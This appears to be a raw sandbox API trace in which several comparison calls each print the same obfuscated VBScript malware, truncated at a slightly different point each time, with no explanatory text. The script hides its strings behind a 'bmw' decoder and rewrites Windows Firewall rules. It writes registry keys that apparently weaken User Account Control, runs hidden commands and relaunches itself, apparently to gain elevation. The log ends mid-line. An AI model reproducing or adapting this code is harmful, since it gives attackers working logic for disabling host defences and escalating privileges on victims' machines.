bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.328] wcsncmp (_String1="NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.328] wcsncmp (_String1="ET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.328] wcsncmp (_String1="T_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.328] wcsncmp (_String1="_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0226.328] wcsncmp (_String1="FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 